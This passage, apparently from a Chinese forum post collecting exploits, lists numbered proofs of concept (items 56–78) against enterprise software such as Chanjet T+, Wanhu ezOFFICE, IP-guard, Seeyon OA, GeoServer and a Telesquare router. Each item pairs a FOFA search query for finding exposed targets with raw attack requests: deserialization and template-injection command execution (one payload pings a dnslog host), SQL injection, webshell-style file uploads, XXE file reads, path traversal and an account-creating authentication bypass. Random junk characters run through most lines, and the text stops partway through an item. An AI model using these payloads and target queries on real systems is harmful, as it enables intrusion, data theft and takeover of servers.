FOFA:app="畅捷通-TPlus"& }) h5 V6 P& ^: i1 K  k
第一步,通过6 _" A4 F! m7 S* S3 R
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie* `' I- }" N: S
第二步,利用获取到的Cookie请求
4 u( y" z4 T& S2 B0 a/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
* @+ D% x' c# C/ X  A" ^& ]; X! Y$ @& a* B- j1 Z" d3 a+ C. `! ?: [/ N
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
. a7 ^5 r6 ?9 z6 g' v% ~- ~FOFA: app="畅捷通-TPlus"
1 y4 F' v* `$ R1 Z4 g4 P. }POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( A5 r6 \# G% A1 t# bHost: x.x.x.x( _" C9 A5 T! D9 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
2 s' o, {1 L6 t1 R6 ZContent-Type: application/json  R! m# c% K9 a0 J. E
; K2 E* R# X) u  `! I/ D: `7 t
{# j% I" o) J( L6 j
  "storeID":{2 I+ q0 s! W' k0 {- O# e
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
- \# U. I; J0 t5 t   "MethodName":"Start",. q" ^# u+ \' w2 Y  T1 A) v' _
    "ObjectInstance":{; r- G, E* [# ~  K
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
  S. M& C9 l$ A( m6 i        "StartInfo": {( D7 f6 M3 p$ ^& I" `1 s$ u0 d+ S
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 o5 j5 {( I7 w* E$ P* J& e           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"( @% X& V/ K" c, D; m; Z/ b
       }2 l- ], Z% s" E& w2 ]3 V' o
    }
" j/ o9 r& U2 K! {  }' {  F% @3 }7 U9 v2 r1 S1 @
}
7 `, G; Q. O: E
) N$ s/ @' x- ~& G1 W+ W
4 G2 s5 J. [/ c5 P2 j57. 畅捷通T+ keyEdit.aspx SQL注入
0 s$ G3 F9 |* R; h) T6 MFOFA:app="畅捷通-TPlus"
0 X" }/ l  w" F- X* hGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
  p0 u; D7 J8 R6 ^Host: host
' Y+ C  o6 s1 [' k( V0 CUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ W* S+ y3 v" P3 z$ p
Accept-Charset: utf-8
6 B. X  ^" o" U  JAccept-Encoding: gzip, deflate) m6 d. A" d  D7 |. x
Connection: close
, y2 m( n9 Z, w' ~& L
  u8 E5 ^" x  o; d7 v3 C% [
  W3 u( J# n/ X8 ~0 r58. 畅捷通T+ KeyInfoList.aspx sql注入
4 U1 k& z6 @8 L8 wFOFA:app="畅捷通-TPlus"! n/ S5 D( K, E( T4 |6 B5 N6 i
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1/ N) F/ V$ a, |" X
Host: your-ip
+ I) p( Y& J" {/ v$ d( A' zUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; F0 I  J( @* C+ W
Accept-Charset: utf-82 t8 y' ~7 }$ S" {1 x; F2 [0 J9 n
Accept-Encoding: gzip, deflate
$ c- j8 T8 @+ w' TConnection: close& y/ j9 J- K. @4 `* M

4 U6 ?8 z; V! E8 J" p/ \0 S$ q3 J+ H
1 O% Q8 ^8 A4 e' @& j59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行( m# n2 g% d" S7 q" P
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
. \% [2 X& z# |( I: j3 J0 M* Y- q0 ?% XPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
8 Q9 F8 J, ~. GHost: 192.168.86.128:90904 ~; z1 ?( C' D, X- E$ I
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; h1 ^7 E4 M9 ^5 V
Connection: close9 P9 m* t: l7 c( q1 I7 n
Content-Length: 16698 P. o9 D$ d. N/ ^
Accept: */*$ |8 t! W. k9 R" s! H
Accept-Language: en
  c/ d/ _, B6 DContent-Type: application/x-www-form-urlencoded. ~/ j! ?$ B0 {% b5 Q0 E1 S
Accept-Encoding: gzip1 F2 m( [: p& I1 i+ l7 k. u
, ^9 z- N9 b' D) L6 F. V/ X
PAYLOAD
* {! w  _8 K1 Y$ z0 M" r" H3 E  M# i* ^8 e" z
4 Z* m) |, u  U" J# f: a! x
60. 百卓Smart管理平台 importexport.php SQL注入
( @& E% w" b' {" @! ]- vFOFA:title="Smart管理平台"4 }* b. i" b4 n3 q+ D0 ]
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
$ f# S% F( O; @Host:# U' N2 u& I. B6 o* {8 e$ F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 V) \% C0 j$ i' R8 q% |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# s0 h4 K+ v7 F; R9 M5 T- `Accept-Encoding: gzip, deflate" F+ d7 t! p. Y7 I/ t" n  r' ?
Accept-Language: zh-CN,zh;q=0.9
5 u6 U. O% H1 D3 p# E% U" C! |Connection: close7 u5 G2 o+ N5 k, w: n

4 Q( ^/ W1 O) A! L1 o0 m. ~: Y1 x4 J1 o9 n. w
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传* D9 }, t& _1 {1 {7 C3 j
FOFA: title="欢迎使用浙大恩特客户资源管理系统"1 F! f) w# t) u( h: [; a
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1) U5 v/ Q8 C9 @3 g% j  A1 {' m
Host: x.x.x.x0 j2 k( `5 u/ D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ m' T* n( u7 G/ h; @' A8 D
Connection: close
+ z% P" Q+ T, GContent-Length: 27
0 F) @& F& f8 E, W0 AAccept: */*) n% Q, ]* |$ _# T
Accept-Encoding: gzip, deflate
9 `& N  Z+ L$ `! |. O1 fAccept-Language: en
' S% ?- X1 W+ g2 s' o' eContent-Type: application/x-www-form-urlencoded
' K& S% I6 f4 q+ k$ ~) @3 |" q* ?
" U! R* P5 W2 _( f/ k' {2 M8uxssX66eqrqtKObcVa0kid98xa; V. G, [9 Z. _9 V8 ?/ O
, c: ?# L" j& t3 Z2 \& v5 }4 H
9 q. P1 W. s/ l9 B
62. IP-guard WebServer 远程命令执行* s( v) j1 P3 w' g' \7 _  v  `* Q# M
FOFA:"IP-guard" && icon_hash="2030860561"
* u* i& p3 M, k. C( F- T) A$ fGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
/ q8 R/ ]- j# V9 [- y; R; zHost: x.x.x.x, D4 A: P; o: I- ?
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
5 S. N  L9 j0 y' q+ [Connection: close; B/ R( H! Z5 |+ K' [
Accept: */*
" ]4 }7 F: v5 P0 B8 _$ L* C" KAccept-Language: en
( R: K0 W  }$ i* q+ @1 {& _Accept-Encoding: gzip, h$ T0 ?3 X; \! K  h1 t) z" A: [) e
) {9 H) m$ }+ `6 l

) f9 _' C. ]6 b/ o$ ?8 j访问
* n0 s; i' Q! w
* {$ m# d  v: I8 ?# m* V$ O- c/ NGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1( y. H$ N1 O0 ^1 A9 O. G
Host: x.x.x.x
3 V/ p7 L' R" S5 `! n; [4 E
5 d% a  d0 k! H, P6 ]( T1 F
- b: p5 X) u7 O0 A63. IP-guard WebServer任意文件读取
8 r( x, z. a! t" p! I' yIP-guard < 4.82.0609.0  W  q+ u3 j% l/ S& J) E6 r
FOFA:icon_hash="2030860561"
& `# ~6 m% E* d4 NPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
) d1 W$ I3 V2 RHost: your-ip
4 |# ]. ?3 F: vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) n9 V, \; `2 f& j9 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. N: ~9 @6 Q3 M& b7 w( @: Z
Accept-Encoding: gzip, deflate2 D3 ?# k% C) ?
Accept-Language: zh-CN,zh;q=0.9
  H( B3 ]3 N/ g% jConnection: close
; F2 x6 Q+ E4 y* s- J' t) jContent-Type: application/x-www-form-urlencoded9 O# z0 _$ P4 J- X2 F& l" e

( ~3 w! ~* a3 C' M- vpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
5 v3 l7 t! B' A7 F3 R  C# F6 `8 x$ N: k5 q+ j9 P5 h% q' B4 c
64. 捷诚管理信息系统CWSFinanceCommon SQL注入2 ?% R  [* z: s7 \
FOFA:body="/Scripts/EnjoyMsg.js"0 k2 F+ M) U. X. Q% ?" f4 K* J
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
8 Z& C2 t( M8 \0 XHost: 192.168.86.128:9001& {6 R: K; \: L. l; `7 R
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
& S% Q9 s* G/ P, a3 lConnection: close. z( F& j  L$ Z2 Y  S8 w8 ?
Content-Length: 369
5 z3 `& Y5 @# w9 RAccept: */*: a, D0 X& g' u) X0 U6 p- n
Accept-Language: en
- _5 Q9 K4 {: B, X5 ]Content-Type: text/xml; charset=utf-8) J: f8 Z, C/ S
Accept-Encoding: gzip& _8 V' [! q! I
6 y: x( m; v6 C
<?xml version="1.0" encoding="utf-8"?>; H" X1 S: M  y  P- V# q% z6 a6 S
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ \" @, T+ t$ @/ y* W<soap:Body>
* `: q$ d# W* O' @    <GetOSpById xmlns="http://tempuri.org/">
5 `0 Z1 c+ t+ A8 p, l" c      <sId>1';waitfor delay '0:0:5'--+</sId>, @5 _% s$ R4 B; ]& ?, H& S& O
    </GetOSpById>
0 X) q* p& u4 ^$ {6 x& q  </soap:Body>6 K: w3 `8 |8 ]( h# y# X
</soap:Envelope>8 B5 X0 @9 M" U2 J2 l
8 V; s1 w3 t/ F/ _) I) a$ E8 k

/ j* a! \/ n2 i. b: {" c65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过% x* t# P- y& D: m+ j. M1 E% y" I8 L
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"/ K4 ]4 A; K5 {# o
响应200即成功创建账号test123456/123456
5 R! O  B: B; y7 sPOST /SystemMng.ashx HTTP/1.1* ?$ N. F! t" L( t0 E
Host:
4 @6 T9 m+ X  [# gUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" J; D6 e" V. ~+ W/ y, L
Accept-Encoding: gzip, deflate$ n% y& b% d: c2 l( O
Accept: */*
& L9 E$ T3 q% G# `% zConnection: close5 ~. g7 ]7 a1 h1 d: f$ l( o
Accept-Language: en
6 O( e6 D3 P$ R8 T7 E4 n- ~) I, P. _Content-Length: 174
& q2 M! I8 X1 K% k* j' g. S% _$ @4 B0 s4 ^
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators" b1 Z0 \6 Z: J* K

9 k* E, h( C& z" [* o4 n( a1 s4 W& N( I
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入% Q/ C: K( }8 e6 Z& ?
FOFA:app="万户ezOFFICE协同管理平台"5 f8 J; H+ I' Z( W6 P* c( z1 L

! n* O* r7 F* {2 \" T2 e7 Q! vGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
- [, N+ L5 q3 ]Host: x.x.x.x3 l) {8 x# `4 Z$ d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 r8 y2 m. Y3 q
Connection: close
4 N  T; N, f1 f, `  a" qAccept: */*
! m1 P' l, X/ x5 z, p$ \Accept-Language: en
( a1 ^: A) t6 C7 p5 ~) E  N0 D. qAccept-Encoding: gzip% F- O# G. c- h5 Z

5 ]1 K0 z" n% B2 c# d8 l+ z. b
1 W7 ^( z; R" S* z& S7 o0 I- d, U0 {( t第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在3 H/ j  C, P6 h5 h

2 e3 |) M$ ~0 e8 c! [/ b- d67. 万户ezOFFICE wpsservlet任意文件上传
$ w1 D) ?* ^- tFOFA:app="万户网络-ezOFFICE"
1 ~, i0 o! c( I9 n9 d  F8 J$ x# WnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型) J5 u- k2 ]# N* L1 j' c
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.16 |# @# c, M' l, S. X$ T
Host: x.x.x.x4 r$ t* I0 z3 ]% p( O
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
* ]+ ^; g6 Z5 ~* V1 |1 h7 V3 k/ aContent-Length: 173/ y) E3 M* T3 G. V! _5 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" m3 v/ u+ j5 r) P$ V
Accept-Encoding: gzip, deflate" O7 d: k2 A' B+ p3 H; C: m! e. R
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.31 S7 O# W5 R1 s& F; U
Connection: close
# u/ R' f% H4 n. c( Y" E% i/ }Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp/ p3 m  b/ x6 R2 g2 F' n: V
DNT: 1
; v* ]7 E5 S0 AUpgrade-Insecure-Requests: 1
3 J) b( `( G* x+ G& i3 O1 F" x. a
, k  P; j* Q* m' a--ufuadpxathqvxfqnuyuqaozvseiueerp! f# F* f& p, ^& V! i" M
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
$ T/ t9 J  W' S9 v+ W
* D& v1 C6 V6 |' y+ g! G<% out.print("sasdfghjkj");%>
: q3 N" x" L2 i--ufuadpxathqvxfqnuyuqaozvseiueerp--
0 D: J8 Q! {7 [4 J$ |  T9 f4 n2 s# G3 C8 w  c

: Z8 A0 X+ t8 {5 b  X8 _- D文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
6 ]: j- d8 Z8 d6 o% R- a1 w: Q2 l, J$ p/ X9 ~+ K
68. 万户ezOFFICE wf_printnum.jsp SQL注入/ R3 i  Y. q# Y0 ^9 c0 i
FOFA:app="万户ezOFFICE协同管理平台"4 Y* ?# R; k: L) D& `% M3 M- w+ c
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" W7 |* c0 y( T) A* U
Host: {{host}}
; }  T4 F3 H, k( t: TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
: r; i; M) A1 Z; K! f% `( u6 _Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
  A  ]5 _/ p6 D( |* I7 `% XAccept-Encoding: gzip, deflate4 K' ~) i" w) w
Accept-Language: zh-CN,zh;q=0.9
/ U! E8 m! J: T9 n5 m* e- {7 RConnection: close+ F1 y; |% N7 \. Y" C8 g4 v
! h4 M+ {# O7 x) {4 ?6 L2 H
, m; m" R! N& ~3 r
69. 万户 ezOFFICE contract_gd.jsp SQL注入! `6 q  h8 Z# b! I2 E% {9 R
FOFA:app="万户ezOFFICE协同管理平台"/ r/ ~0 _9 T7 z$ M3 e, l9 Q
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1+ b# \# @9 I+ n! u5 ~
Host: your-ip
* |1 ?; j$ o. X2 e( m3 B, v- S6 kUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 q: b* s. M, h) l1 F& ^. ~% A- B9 VAccept-Encoding: gzip, deflate1 o& O. j+ E' p. _* q& M
Accept: */*
5 h! E( Y( ~' t, ]: Q4 z3 sConnection: keep-alive( [4 Q( S, e! ?" C' j
1 V- t. [* `9 p6 I# t

! z! ]& a% G" ^# J/ p4 q70. 万户ezEIP success 命令执行
8 F6 Q% L/ g( {/ IFOFA:app="万户网络-ezEIP"; {) y+ e4 F! W& {
POST /member/success.aspx HTTP/1.1, |4 i* a$ l) t3 P
Host: {{Hostname}}
& d( j$ u/ z- |8 U# p/ D# sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 f9 Q4 W' w% ?  Z9 V" e
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=" x2 ?, I/ e5 {! f2 K, N
Content-Type: application/x-www-form-urlencoded5 j/ @! b# p, v& y6 w/ f
TYPE: C+ \3 M# E6 @  f" c, I6 z
Content-Length: 16702
! s8 z- w4 x  Z0 N4 A) f6 \+ s) V* ?
__VIEWSTATE=PAYLOAD  T5 X$ ~; ]' U5 I! k. L$ @. f

0 H: i0 D) e; a# F) @2 d7 S( h- L. M. g4 z! W; q8 y
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
3 X8 ~5 b, u2 C. VFOFA:body="PM2项目管理系统BS版增强工具.zip"' e: W. R- M+ x  S7 H, p
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1& C) h2 c4 ?! _/ Q& c) h
Host: x.x.x.xx.x.x.x
; F4 E) `3 ~/ k5 d  o2 n8 VUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( ^5 X; Y0 H, N. }Connection: close8 {+ v! Z. t" U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, ^4 ?5 Y( }$ }; B! I% t7 aAccept-Encoding: gzip, deflate
& t6 d# h& B* t# ]8 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 f) I* E+ Q. N- k9 hUpgrade-Insecure-Requests: 1- J1 j  e. J$ ?0 D# I# R3 j

( g3 ^- u% f2 o  w. H( J) ^1 n7 m6 W  a
72. 致远OA getAjaxDataServlet XXE0 n9 i4 ^  X8 t. T$ C9 L, g
FOFA:app="致远互联-OA"
' s7 a8 U8 L3 V3 l5 y" `POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1+ u9 L0 [$ ~. u& {( h
Host: 192.168.40.131:8099
' L8 h! Z4 z5 w8 |8 T7 ~User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
, X( p& N( K1 Q- {+ YConnection: close) U" h% f) G  Z: j4 ]& z
Content-Length: 5836 A7 e$ v0 d5 B
Content-Type: application/x-www-form-urlencoded" o6 n: j% Q; e4 W6 C
Accept-Encoding: gzip
0 o% w* d, E5 }: D2 i8 e2 A( ^9 N
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E2 R- f0 _0 N0 _% V, L: E
' k$ K7 h2 B% O3 b4 f% R1 P) `

7 e: ]5 `/ y8 c; K73. GeoServer wms远程代码执行! [  M/ p% H# m" M6 M  W( x% q, u
FOFA:icon_hash=”97540678”
, s+ d+ W; b  b" J( `+ F' cPOST /geoserver/wms HTTP/1.1
- j/ ^  t( J% X3 G0 w) Z: R& FHost:1 A5 F; j# f) S; s- @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! h- e0 |  h3 l, vContent-Length: 19811 [  d+ [( w  i' a
Accept-Encoding: gzip, deflate
, K3 y  I# f" c& L- Q* A* T" b( oConnection: close: z" S# Q% v! H' q7 U
Content-Type: application/xml* G/ L4 z( Z0 ]
SL-CE-SUID: 3: z; W" B: v1 V

. f( H$ q  j  u/ [PAYLOAD
0 q, q+ e! g7 k0 G; `. M3 p% e: [
4 n6 X, \: [, a) }/ v
74. 致远M3-server 6_1sp1 反序列化RCE
1 r1 K! w" g. x* k9 Y. PFOFA:title="M3-Server"
7 |; N! Z% X* t/ rPAYLOAD6 `0 v' R. y1 G5 ^2 p$ p/ S7 h

7 m3 w+ x2 e" |" K! z3 u  g/ n75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE9 j$ j# s8 `+ m7 Q% F( I
FOFA:app="TELESQUARE-TLR-2005KSH"& g6 k2 [- M% I) m- @
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
& V' b' d- ]5 ?/ V" r) U% j$ }4 RHost: x.x.x.x
5 m! O2 _# b4 a+ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 \& {1 T8 n4 e; q! g  R
Connection: close: N( P$ S3 e# S) O2 l2 l$ M' O
Accept: */*
; N$ n- a  D5 \( D1 |6 mAccept-Language: en
# ?) R2 z1 w$ E1 `! q: x0 J, KAccept-Encoding: gzip
  N( V9 c4 j* m, H: J: P* E
+ o* S2 L+ T9 L( z7 S9 x+ `0 R9 s4 P0 ]; B6 A
GET /cgi-bin/test28256.txt HTTP/1.1
# G. |7 L8 P: N1 f% ?  f! BHost: x.x.x.x) V, H7 m8 K; G) c

4 v. S& R0 s; h3 h/ W7 T% y" R
2 C& M( }2 I5 P- n; w4 n2 X76. 新开普掌上校园服务管理平台service.action远程命令执行
" y( {& n8 N, LFOFA:title="掌上校园服务管理平台"
9 P( p( e. f5 [9 M# d* @POST /service_transport/service.action HTTP/1.18 Y8 J& C# ]) ^. ?0 W: I
Host: x.x.x.x
- Y& x) L8 D2 i4 V8 F7 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 c' H/ n) J; k8 {
Connection: close
- C0 p- k$ j; R- b- ~+ a# l5 Z9 B* UContent-Length: 211) `! B5 u/ w) R9 L7 I5 m6 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 i7 z0 r- Y. k! I& A  u
Accept-Encoding: gzip, deflate1 Y: R! A, B" `, |* C4 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ p3 i1 r* _; z, VCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
; p' P1 t* m( h+ H/ l4 U  p; _4 WUpgrade-Insecure-Requests: 1
. Z" [3 {$ T0 s' B; m( o$ H# ~1 h9 Y/ r; H& h5 h
{. V5 A! u. L( U# u
"command": "GetFZinfo",
/ c: E' K( H2 y8 w3 ]; }2 B6 F( a  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
. ^6 p: {2 _) q+ S  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"" P3 A0 O% @0 B; k% y2 P; y' n; ?
}
( Z8 d0 @" V# A* z
; C. R* t0 Z- f9 L/ g" j, n) H1 D& _/ j0 b/ p$ S  u
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1* }' \3 c) z. C/ ~$ ]
Host: x.x.x.x* U5 x- }& T7 b% h3 C4 n$ ^
& `1 B. e2 s/ T" b' g

& q3 h- A9 E# p! L$ ]" g% w# [) }8 E/ \: j7 \
77. F22服装管理软件系统UploadHandler.ashx任意文件上传+ g& y9 }8 k# c" R1 J% b
FOFA:body="F22WEB登陆"
# _" g' E: L7 ?POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
: Q( G+ T9 D0 [! T- U) `4 q5 [" {/ KHost: x.x.x.x6 i# K+ i6 i& r4 e1 z' {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; |1 ]- k& E. ]0 F4 ]+ rConnection: close2 U" C6 |: L8 ], U7 f% t9 @  C
Content-Length: 433
+ R; A$ D0 U/ e. eAccept: */*
0 O: B( W7 {9 @/ mAccept-Encoding: gzip, deflate4 Z6 Q. N3 b6 U3 p& X5 X- p
Accept-Language: zh-CN,zh;q=0.9
. z# M/ l% q/ X$ H! _Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix# B# }$ ?0 J; U
8 g% J( z' C: m' f# R8 `
------------398jnjVTTlDVXHlE7yYnfwBoix
: q8 t% q4 F1 n* NContent-Disposition: form-data; name="folder"9 \$ a4 T6 c% u0 A( j

' `3 O8 u& z1 ~1 y4 {) _/upload/udplog
5 P9 c! W% i5 o  G------------398jnjVTTlDVXHlE7yYnfwBoix
$ ?2 A& t" b( V4 p4 YContent-Disposition: form-data; name="Filedata"; filename="1.aspx"+ r  ~6 J1 i2 |0 |! y
Content-Type: application/octet-stream
; h$ q( a1 e$ B# P1 ^
$ M4 k: x8 ^* L# T" ~( p- }) _. uhello12345670 R' f* P' V8 B* e
------------398jnjVTTlDVXHlE7yYnfwBoix
6 `* Q% Q" ~5 R0 }) j: QContent-Disposition: form-data; name="Upload", q( b5 X' Y0 `: j4 \4 O
3 i  R* g0 e  ~, `2 \* f# s
Submit Query
% B' R: G" {, y" N------------398jnjVTTlDVXHlE7yYnfwBoix--' h) _/ o4 y) T1 }% x

( \' c% P: H2 b+ H& ?& j/ U
4 u/ V% V0 p% {78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
& ^8 d) w3 c( y( w% i. |FOFA:icon_hash="2001627082"; |! @# Y  F. w0 r$ I1 P$ ?9 A
POST /Platform/System/FileUpload.ashx HTTP/1.1
# I- ~) V3 x& @1 Y6 |+ E9 L5 zHost: x.x.x.x: A  N' J' R& ~
